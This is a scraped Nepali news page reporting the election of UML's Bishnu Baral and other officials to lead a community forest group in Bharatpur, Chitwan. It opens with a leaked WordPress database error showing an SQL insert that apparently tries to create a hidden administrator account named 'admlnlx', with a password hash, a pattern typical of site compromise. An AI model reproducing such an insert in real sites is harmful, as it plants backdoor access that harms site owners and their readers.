WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bq7w1uAe/Vst7GEXQf9T7Y.f5Itdb00', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-31 00:46:31', '', 'admlnlx', 'admlnlx')
चितवन,पुस १०
नवजागृती सामुदायीक वन भरतपुर भोजाडको अध्यक्षमा विष्णु वराल निर्वाचित भएका छन् ।उनि एमाले प्यानलवाट चुनावमा उठेका थिए । तिन वर्षे कार्यकालका लागी अध्यक्ष संगै अधिकांस पद एमालेको पोल्टामा परेको छ ।उपाध्यक्षमा भने राप्रपाका विष्णु अधिकारी निर्वाचित भएका छन् ।
यस्तै सचिवमा शान्ता अधिकारी,सहसचिवमा यादव श्रेष्ठ,कोषाध्यक्षमा सिता अधिकारी र लेखा समिती संयोजकमा संकर अधिकारी निर्वाचित भएका छन् ।कांग्रेस र माओवादी केन्द्रका तर्फवाट एकजना सदस्य मात्र निर्वाचित भएका छन् ।२ सय ६ जना प्रतिनिधी सहभागी अधिवेशनमा आन्तरिक विवादले कांग्रेस र माओवादी केन्दले प्यानल खडा गर्न नसकेपछी मनोनयन फिर्ता ल्याएका थिए ।